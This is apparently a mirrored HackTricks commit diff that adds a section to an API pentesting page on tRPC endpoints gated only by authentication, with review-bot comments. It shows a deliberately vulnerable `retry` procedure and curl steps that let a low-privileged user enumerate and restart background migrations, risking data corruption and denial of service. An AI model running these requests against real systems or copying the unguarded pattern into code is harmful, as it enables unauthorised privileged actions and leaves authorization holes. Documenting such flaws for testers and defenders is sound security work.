mirror of https://github.com/HackTricks-wiki/hacktricks.git, synced 2025-10-10 18:36:50 +00:00
Merge pull request #1457 from HackTricks-wiki/update_How_An_Authorization_Flaw_Reveals_A_Common_Securit_20251001_125513
How An Authorization Flaw Reveals A Common Security Blind Sp...
commit ef576d4a32
				| @ -28,6 +28,53 @@ Pentesting APIs involves a structured approach to uncovering vulnerabilities. Th | ||||
| - **Advanced Parameter Techniques**: Test with unexpected data types in JSON payloads or play with XML data for XXE injections. Also, try parameter pollution and wildcard characters for broader testing. | ||||
| - **Version Testing**: Older API versions might be more susceptible to attacks. Always check for and test against multiple API versions. | ||||
| 
 | ||||
| ### Authorization & Business Logic (AuthN != AuthZ) — tRPC/Zod protectedProcedure pitfalls | ||||
| 
 | ||||
| Modern TypeScript stacks commonly use tRPC with Zod for input validation. In tRPC, `protectedProcedure` typically ensures the request has a valid session (authentication) but does not imply the caller has the right role/permissions (authorization). This mismatch leads to Broken Function Level Authorization/BOLA if sensitive procedures are only gated by `protectedProcedure`. | ||||
| 
 | ||||
| - Threat model: Any low-privileged authenticated user can call admin-grade procedures if role checks are missing (e.g., background migrations, feature flags, tenant-wide maintenance, job control). | ||||
| - Black-box signal: `POST /api/trpc/<router>.<procedure>` endpoints that succeed for basic accounts when they should be admin-only. Self-serve signups drastically increase exploitability. | ||||
| - Typical tRPC route shape (v10+): JSON body wrapped under `{"input": {...}}`. | ||||
| 
 | ||||
| Example vulnerable pattern (no role/permission gate): | ||||
| 
 | ||||
| ```ts | ||||
| // The endpoint for retrying a migration job | ||||
| // This checks for a valid session (authentication) | ||||
| retry: protectedProcedure | ||||
|   // but not for an admin role (authorization). | ||||
|   .input(z.object({ name: z.string() })) | ||||
|   .mutation(async ({ input, ctx }) => { | ||||
|     // Logic to restart a sensitive migration | ||||
|   }), | ||||
| ``` | ||||
| 
 | ||||
| Practical exploitation (black-box) | ||||
| 
 | ||||
| 1) Register a normal account and obtain an authenticated session (cookies/headers). | ||||
| 2) Enumerate background jobs or other sensitive resources via “list”/“all”/“status” procedures. | ||||
| 
 | ||||
| ```bash | ||||
| curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.all' \ | ||||
|   -H 'Content-Type: application/json' \ | ||||
|   -b '<AUTH_COOKIES>' \ | ||||
|   --data '{"input":{}}' | ||||
| ``` | ||||
| 
 | ||||
| 3) Invoke privileged actions such as restarting a job: | ||||
| 
 | ||||
| ```bash | ||||
| curl -s -X POST 'https://<tenant>/api/trpc/backgroundMigrations.retry' \ | ||||
|   -H 'Content-Type: application/json' \ | ||||
|   -b '<AUTH_COOKIES>' \ | ||||
|   --data '{"input":{"name":"<migration_name>"}}' | ||||
| ``` | ||||
| 
 | ||||
| Impact to assess | ||||
| 
 | ||||
| - Data corruption via non-idempotent restarts: Forcing concurrent runs of migrations/workers can create race conditions and inconsistent partial states (silent data loss, broken analytics). | ||||
| - DoS via worker/DB starvation: Repeatedly triggering heavy jobs can exhaust worker pools and database connections, causing tenant-wide outages. | ||||
| 
 | ||||
| ### **Tools and Resources for API Pentesting** | ||||
| 
 | ||||
| - [**kiterunner**](https://github.com/assetnote/kiterunner): Excellent for discovering API endpoints. Use it to scan and brute force paths and parameters against target APIs. | ||||
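Review bot: The vulnerable `retry` pattern is shown without its fixed counterpart, so the section tells readers what is wrong but never what the correct gate looks like; suggest adding a second `ts` block directly after it with an `adminProcedure` derived from `protectedProcedure` via `.use()` that throws `new TRPCError({ code: 'FORBIDDEN' })` unless the role on `ctx` is an admin role, and then `retry: adminProcedure.input(z.object({ name: z.string() }))`, plus one sentence stating that the Zod `.input()` schema validates shape only and is not an authorization control. Two smaller points in the same hunk: `Practical exploitation (black-box)` and `Impact to assess` are bare paragraphs acting as headings while the rest of the page uses `###`, so they should carry a heading marker; and step 1 says the session may be carried in cookies or headers, but both curl examples show only `-b '<AUTH_COOKIES>'`, so a short note on passing an `Authorization` header with `-H` for header-based sessions would keep the steps consistent with step 1.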
| @ -53,8 +100,6 @@ kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0 | ||||
| ## References | ||||
| 
 | ||||
| - [https://github.com/Cyber-Guy1/API-SecurityEmpire](https://github.com/Cyber-Guy1/API-SecurityEmpire) | ||||
| - [How An Authorization Flaw Reveals A Common Security Blind Spot: CVE-2025-59305 Case Study](https://www.depthfirst.com/post/how-an-authorization-flaw-reveals-a-common-security-blind-spot-cve-2025-59305-case-study) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| 
 | ||||
| 
 | ||||
|  | ||||
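Review bot: The hunk header `@ -53,8 +100,6` says this hunk shrinks the file by two lines, yet the rendered view shows only the added CVE-2025-59305 reference and a run of unmarked blank lines, so a reviewer cannot tell which two lines were dropped; confirm that only trailing blank lines after `{{#include ../../banners/hacktricks-training.md}}` were removed and that no existing reference entry was lost, and consider trimming the remaining blank lines below the include to a single one.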